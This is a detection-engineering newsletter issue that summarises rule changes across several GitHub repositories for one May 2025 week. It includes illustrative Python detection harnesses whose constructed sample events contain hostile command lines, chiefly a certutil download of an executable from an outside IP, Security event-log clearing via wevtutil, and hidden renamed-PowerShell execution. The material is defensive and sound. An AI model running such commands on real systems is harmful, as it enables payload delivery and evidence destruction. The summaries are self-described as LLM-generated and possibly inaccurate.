Detections Digest #20250519
This issue covers the key detection rule updates from May 12 to May 19, 2025, from 5 out of 40+ monitored GitHub repositories, including details on 16 new rules and updates to 34 existing ones.
This week's (horribly delayed 😓) issue highlights the most significant changes to detection rules from 5 of the 40+ monitored GitHub repositories. Between May 12 and May 19, 2025, contributors added 16 new rules and updated 34 existing ones.
Stay informed on the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.
Key Takeaways
Focus on brand and credential phishing — New rules address phishing that abuses Zoom, Ludus, Scribd, and Google Docs, each aimed at credential theft and relying on link, HTML, and language analysis to flag suspicious messages (sublime-security/sublime-rules).
Chrome vulnerability detection — Two rules target CVE-2025-4664: one inventories vulnerable Chrome versions across the fleet, the other flags potential exploitation on devices used by critical identities (SlimKQL/Hunting-Queries-Detection-Rules).
Cloud platform monitoring — A new rule detects bot creation and publishing through Microsoft 365 Copilot shared agents, reflecting closer monitoring of cloud service abuse and unauthorized access patterns (SlimKQL/Hunting-Queries-Detection-Rules).
Malicious driver detection updates — Coverage of malicious and vulnerable driver loads was maintained and extended by updating the driver-name lists and hash values the rules match on (magicsword-io/LOLDrivers).
Search optimisation in Splunk rules — Many Splunk detections were reworked to use tstats, joins, and regex to improve performance and reduce false positives (splunk/security_content).
Ransomware and file manipulation focus — Rules now cover Windows Event Log clearing via wevtutil, file zeroing via fsutil, and file downloads via certutil, all techniques seen in ransomware operations and data tampering (splunk/security_content).
New SAP and Cisco firewall rules — New detections cover SAP NetWeaver Visual Composer exploitation (CVE-2025-31324) and Cisco Secure Firewall intrusion events mapped from Snort signature IDs to known threat activity (splunk/security_content).
Table Of Contents
sublime-security/sublime-rules (+5, ✎6)
SigmaHQ/sigma (✎1)
magicsword-io/LOLDrivers (✎6)
splunk/security_content (+7, ✎21)
📢 This week there is no STIX2 bundle with the new rules, as we’re building a new capability for sharing the rules and, unfortunately, it’s not ready yet. Stay tuned!
Corporate repositories (4)
sublime-security/sublime-rules (+5, ✎6)
https://github.com/sublime-security/sublime-rules
+ New rules
Two new multi-stage phishing detection rules have been implemented. The first focuses on credential phishing via Google Docs, analyzing links and text content for redirect patterns and suspicious domains. The second analyzes Scribd documents for similar threats, targeting Microsoft services and using natural language and HTML analysis. Both rules employ domain trust evaluation and DMARC authentication methods (Link: Multistage Landing - Published Google Doc, Link: Multistage Landing - Scribd Document).
Updates include the introduction of a rule for identifying Zoom brand impersonation. This rule checks messages for fake Zoom branding through analysis of social footers, webinar links, and content patterns (Brand Impersonation: Zoom).
Two rules target credential theft via links in presentations and documents. The first tracks Ludus presentations used for phishing, examining links, embedded content, and sender trust. The second rule monitors Scribd fullscreen links from unknown senders, using URL and sender analysis to detect phishing attempts (Link: Multistage Landing - Ludus Presentation, Link: Scribd Fullscreen Link From Suspicious Sender).
✎ Modified rules
The rule "EML attachment with credential theft language (unknown sender)" was updated to use profile.by_sender_email() for more accurate sender profiling, and its false-positive handling now uses any_messages_benign to better separate benign from malicious messages (EML attachment with credential theft language (unknown sender)).
The rule "Vendor Compromise: GovDelivery Message With Suspicious Link" now includes legistar1.com in its list of known-good domains, since the domain belongs to Granicus (Vendor Compromise: GovDelivery Message With Suspicious Link).
The rule "Fake email quarantine notification" gained the keywords incoming and recover, widening its coverage of phishing that poses as quarantine notifications (Fake email quarantine notification).
The "Corporate Services Impersonation Phishing" rule now includes a pattern for HR-related administrative subjects, improving coverage of HR impersonation phishing (Corporate Services Impersonation Phishing).
The rule "Request for Quote or Purchase (RFQ|RFP) with suspicious sender or recipient pattern" was adjusted to better handle sender-recipient email matches, update its trusted-domain logic, refine recipient contact-history checks, and exclude advertising topics from results (Request for Quote or Purchase (RFQ|RFP) with suspicious sender or recipient pattern).
In the "Brand impersonation: DocuSign" rule, the regex patterns for DocuSign message IDs were tightened, docusign.co.uk was added as a legitimate domain, sadq.sa was excluded, and HTML parsing was standardized (Brand impersonation: DocuSign).
SigmaHQ/sigma (✎1)
https://github.com/SigmaHQ/sigma
✎ Modified rules
A rule targeting potentially suspicious WDAC policy file creation was updated by adding a filter to exclude events when the Image is 'System', helping reduce false positives. References and modified date were also updated. (Potentially Suspicious WDAC Policy File Creation)
magicsword-io/LOLDrivers (✎6)
https://github.com/magicsword-io/LOLDrivers
✎ Modified rules
Several rules targeting driver loads were updated. The "Malicious Driver Load By Name" rule was modified by updating the list of driver names in its logic. The "Vulnerable Driver Load By Name" rule expanded its scope by adding new filenames for potentially vulnerable drivers. (Malicious Driver Load By Name, Vulnerable Driver Load By Name)
Multiple hash-based rules saw updates. The "Vulnerable Driver Load" rule has new MD5 hashes for better coverage. Similarly, the "Vulnerable Driver Load Despite HVCI" and "Malicious Driver Load Despite HVCI" rules were updated by adding and removing hash values to keep the detections current. The "Malicious Driver Load" rule updated its hashes to cover a broader range of threats. (Vulnerable Driver Load, Vulnerable Driver Load Despite HVCI, Malicious Driver Load Despite HVCI, Malicious Driver Load)
splunk/security_content (+7, ✎21)
https://github.com/splunk/security_content
+ New rules
Four new rules cover Windows activity: file downloads via certutil.exe, event log clearing via wevtutil, event log reconnaissance using wevtutil, wmic, and PowerShell, and execution of a renamed PowerShell binary, a common way to slip past name-based controls. The rules key on process names, command-line arguments, and process telemetry from Endpoint Detection and Response (EDR) agents. (Windows File Download Via CertUtil, Windows Eventlog Cleared Via Wevtutil, Windows EventLog Recon Activity Using Log Query Utilities, Windows Renamed Powershell Execution)
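To show what these four behaviours look like in process telemetry, here is a small Python harness written for this digest (example code, not the Splunk detections themselves) that runs equivalent checks over constructed Sysmon-style process events. The field names, the regexes, and the PowerShell OriginalFilename values (PowerShell.EXE, pwsh.dll) used to catch a renamed binary are assumptions of the example; the Splunk searches use their own data-model fields.

```python
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Process-creation record with the fields the checks need (Sysmon EID 1 style; constructed for this example)."""
    host: str
    image: str                    # full path of the started executable
    command_line: str
    original_file_name: str = ""  # PE version-info OriginalFilename; survives renaming the file on disk


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# certutil fetching a URL into its cache (the classic -urlcache -split -f download) or via -verifyctl
CERTUTIL_DOWNLOAD = re.compile(r"-(?:urlcache|verifyctl)\b.*\bhttps?://", re.I)
# wevtutil cl|clear-log <log>, as a standalone argument
WEVTUTIL_CLEAR = re.compile(r"(?:^|\s)(?:cl|clear-log)(?:\s|$)", re.I)
# wevtutil verbs that enumerate or read logs
WEVTUTIL_RECON = re.compile(r"(?:^|\s)(?:qe|query-events|el|enum-logs|gl|get-log)(?:\s|$)", re.I)
WMIC_RECON = re.compile(r"\bntevent\b", re.I)          # wmic ntevent where ...
POWERSHELL_RECON = re.compile(r"\bGet-(?:WinEvent|EventLog)\b", re.I)

# ASSUMPTION: OriginalFilename values carried by the Windows PowerShell and PowerShell 7 hosts.
POWERSHELL_ORIGINAL_NAMES = {"powershell.exe", "pwsh.dll"}
POWERSHELL_IMAGE_NAMES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}


def is_powershell(ev: ProcessEvent) -> bool:
    """True for PowerShell whether or not the file on disk still carries its usual name."""
    return (basename(ev.image) in POWERSHELL_IMAGE_NAMES
            or ev.original_file_name.lower() in POWERSHELL_ORIGINAL_NAMES)


def classify(ev: ProcessEvent) -> list[str]:
    """Names of every illustrative detection the event satisfies (empty list = nothing fired)."""
    hits: list[str] = []
    name = basename(ev.image)
    cmd = ev.command_line
    if name == "certutil.exe" and CERTUTIL_DOWNLOAD.search(cmd):
        hits.append("certutil_download")
    if name == "wevtutil.exe":
        if WEVTUTIL_CLEAR.search(cmd):
            hits.append("eventlog_cleared")
        elif WEVTUTIL_RECON.search(cmd):
            hits.append("eventlog_recon")
    if name == "wmic.exe" and WMIC_RECON.search(cmd):
        hits.append("eventlog_recon")
    if is_powershell(ev) and POWERSHELL_RECON.search(cmd):
        hits.append("eventlog_recon")
    # Renamed PowerShell: version info still says PowerShell although the file name on disk changed.
    if ev.original_file_name.lower() in POWERSHELL_ORIGINAL_NAMES and name not in POWERSHELL_IMAGE_NAMES:
        hits.append("renamed_powershell")
    return hits


def run_detections(events) -> list[tuple[str, str, list[str]]]:
    """(host, command line, matches) for every event that fired at least one check."""
    return [(ev.host, ev.command_line, h) for ev in events if (h := classify(ev))]


# Constructed sample telemetry for this example; not real logs.
SAMPLE_PROCESS_EVENTS = [
    ProcessEvent("ws01", r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://198.51.100.7/a.exe C:\Users\Public\a.exe"),
    ProcessEvent("ws01", r"C:\Windows\System32\certutil.exe", r"certutil -hashfile C:\tools\x.exe SHA256"),
    ProcessEvent("ws02", r"C:\Windows\System32\wevtutil.exe", "wevtutil.exe cl Security"),
    ProcessEvent("ws02", r"C:\Windows\System32\wevtutil.exe", "wevtutil qe Security /c:20 /f:text"),
    ProcessEvent("ws03", r"C:\Windows\System32\wbem\wmic.exe",
                 "wmic ntevent where \"LogFile='Security'\" get Message"),
    ProcessEvent("ws04", r"C:\Users\Public\svchost.exe",
                 r"C:\Users\Public\svchost.exe -nop -w hidden -c Get-WinEvent -LogName Security -MaxEvents 50",
                 original_file_name="PowerShell.EXE"),
    ProcessEvent("ws05", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -File C:\scripts\inventory.ps1", original_file_name="PowerShell.EXE"),
]

if __name__ == "__main__":
    for host, cmd, hits in run_detections(SAMPLE_PROCESS_EVENTS):
        print(f"{host}: {', '.join(hits)} <- {cmd}")
```

The renamed-PowerShell case is the reason to key on OriginalFilename rather than the process name alone: the sixth sample fires both the recon check and the rename check even though nothing in its path says PowerShell.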
New rule identifies exploitation attempts on SAP NetWeaver Visual Composer by monitoring HTTP HEAD or POST requests with a 200 OK status to specific endpoints. This addresses CVE-2025-31324, an unauthenticated file upload vulnerability. (SAP NetWeaver Visual Composer Exploitation Attempt)
MacOS AMOS Stealer detection tracks virtual machine check activity using osquery to monitor process events. It identifies execution of "osascript" with command-line arguments related to VMware or QEMU. (MacOS AMOS Stealer - Virtual Machine Check Activity)
Cisco Secure Firewall rule leverages IntrusionEvent logs to detect intrusion events related to known threat activities. It uses lookup tables to map Snort signature IDs to threat actors and techniques. (Cisco Secure Firewall - Intrusion Events by Threat Activity)
✎ Modified rules
Detection logic improvements were applied to the rules for processes started with no command-line arguments that then make network connections: regex matching on the command line, a join against network data, and refined queries for DLLHost, GPUpdate, Rundll32, and SearchProtocolHost, all aimed at better separating suspicious instances of these processes from their normal network activity (DLLHost with no Command Line Arguments with Network, GPUpdate with no Command Line Arguments with Network, Rundll32 with no Command Line Arguments with Network, SearchProtocolHost with no Command Line with Network).
Detection rules for file manipulation and suspicious file activity received query enhancements. The rules, including those for Outlook and PowerShell activity, benefit from better correlation, fewer false positives, and higher efficiency (Detect Outlook exe writing a zip file, Fsutil Zeroing File, Java Writing JSP File, PowerShell Loading DotNET into Memory via Reflection, Spoolsv Writing a DLL, Suspicious Image Creation In Appdata Folder, Suspicious WAV file in Appdata Folder, Suspicious writes to windows Recycle Bin, Windows Phishing Outlook Drop Dll In FORM Dir).
Enhanced detection coverage has been applied for several specific scenarios including: registry deletions by unexpected processes, remote network connections, system processes from unexpected locations, and use of InstallUtil with network activity. These updates involve query optimizations and better data source integration (System Processes Run From Unexpected Locations, Unknown Process Using The Kerberos Protocol, Windows Defacement Modify Transcodedwallpaper File, Windows Deleted Registry By A Non Critical Process File Path, Windows InstallUtil Remote Network Connection, Windows InstallUtil Uninstall Option with Network, Windows Office Product Dropped Cab or Inf File, Windows WinLogon with Public Network Connection).
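To make the "no command line plus network" join concrete, the following Python example (added here for this digest; not the Splunk rules' SPL) correlates constructed process-creation and network-connection records on a shared process GUID and alerts only when one of the four watched binaries was started bare and then reached an address outside the internal ranges. The bare-command-line regex, the GUID join key, and the internal-range exclusion are assumptions of the example, not details of the Splunk searches.

```python
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    process_guid: str   # join key shared by the EDR's process and network records (assumption)
    host: str
    image: str
    command_line: str


@dataclass(frozen=True)
class NetworkEvent:
    process_guid: str
    dest_ip: str
    dest_port: int


# Binaries that normally receive arguments (a CLSID, /target, a DLL entry point) and almost never run bare.
WATCHED = ("dllhost", "gpupdate", "rundll32", "searchprotocolhost")
# A command line that is nothing but the executable: optional quotes, optional drive path, no arguments.
BARE_COMMAND_LINE = re.compile(
    r'^\s*"?(?:[a-z]:\\[^"\s]*\\)?(?:' + "|".join(WATCHED) + r')\.exe"?\s*$', re.I)

# Tuning choice for this example: ignore connections to RFC 1918, loopback and link-local space.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def is_bare_watched_process(ev: ProcessEvent) -> bool:
    return BARE_COMMAND_LINE.match(ev.command_line) is not None


def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def correlate(processes, connections) -> list[dict]:
    """Join bare-command-line watched processes to their external connections; one alert per connection."""
    candidates = {p.process_guid: p for p in processes if is_bare_watched_process(p)}
    alerts = []
    for c in connections:
        p = candidates.get(c.process_guid)
        if p is not None and is_external(c.dest_ip):
            alerts.append({"host": p.host, "image": p.image, "dest": f"{c.dest_ip}:{c.dest_port}"})
    return alerts


# Constructed sample records for this example; GUIDs are arbitrary labels.
SAMPLE_PROCESSES = [
    ProcessEvent("g1", "ws01", r"C:\Windows\System32\rundll32.exe", "rundll32.exe"),
    ProcessEvent("g2", "ws01", r"C:\Windows\System32\rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
    ProcessEvent("g3", "ws02", r"C:\Windows\System32\dllhost.exe", r'"C:\Windows\System32\dllhost.exe"'),
    ProcessEvent("g4", "ws02", r"C:\Windows\System32\dllhost.exe",
                 "dllhost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}"),
    ProcessEvent("g5", "ws03", r"C:\Windows\System32\gpupdate.exe", "gpupdate.exe"),
    ProcessEvent("g6", "ws04", r"C:\Windows\System32\SearchProtocolHost.exe",
                 r"C:\Windows\System32\SearchProtocolHost.exe"),
]
SAMPLE_CONNECTIONS = [
    NetworkEvent("g1", "203.0.113.5", 443),     # bare rundll32 -> external: alert
    NetworkEvent("g2", "203.0.113.5", 443),     # rundll32 with arguments: not a candidate
    NetworkEvent("g3", "10.0.0.5", 445),        # bare dllhost but internal destination: suppressed
    NetworkEvent("g4", "203.0.113.9", 443),     # dllhost with a CLSID: not a candidate
    NetworkEvent("g6", "198.51.100.20", 80),    # bare SearchProtocolHost -> external: alert
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_PROCESSES, SAMPLE_CONNECTIONS):
        print(alert)
```

Note that gpupdate (g5) is bare but never connects anywhere, so the join drops it; the network leg is what turns a noisy "no arguments" condition into something worth paging on.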
Personal repositories (1)
SlimKQL/Hunting-Queries-Detection-Rules (+4)
https://github.com/SlimKQL/Hunting-Queries-Detection-Rules
+ New rules
A new KQL rule detects vulnerable versions of Google Chrome associated with CVE-2025-4664, excluding version 136.0.7103.114. The rule counts and sorts the vulnerable versions found in DeviceProcessEvents, helping gauge how widespread the exposure is across an organization (CVE-2025-4664 Chrome flaw with public exploit).
Another rule detects potential exploitation of the CVE-2025-4664 Chrome zero-day on devices used by critical identities. It inspects versions using ExposureGraphNodes, ExposureGraphEdges, and DeviceProcessEvents, focusing on cases where critical users hold administrative privileges (Critical identities with zero-day Chrome vulnerability).
A new rule identifies social engineering attempts in Teams by analyzing external inbound messages for URLs that point to known RMM tools. Approved URLs are excluded so that only unexpected remote-access links surface, which keeps the rule focused on the lure an attacker posing as IT support would send (Detecting Social Engineering Attacks in Teams with KQL).
The M365 Copilot Shared Agent rule monitors bot creation and publishing by querying CloudAppEvents for the action types 'BotCreate' and 'BotUpdateOperation-BotPublish'. Unexpected bot activity there can indicate a compromised M365 environment (Detecting M365 Copilot Shared Agent).
Feedback
Your input helps us improve! If you spot any issues, mistakes, or omissions in this digest issue, or have suggestions for new data sources to include, we'd love to hear from you. Contact us at team@rulecheck.io - we value your feedback and are committed to improving this resource for the detection engineering community.
Disclaimer
The summaries in this brief are generated autonomously by the OpenAI LLM model based on the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.
Powered by
This digest is made possible through our partnership with BlackStork, combining their content generation technology with our detection engineering expertise to deliver timely, high-quality updates straight to your inbox.
Looking for a customized version of this newsletter? We'd be happy to help — contact us.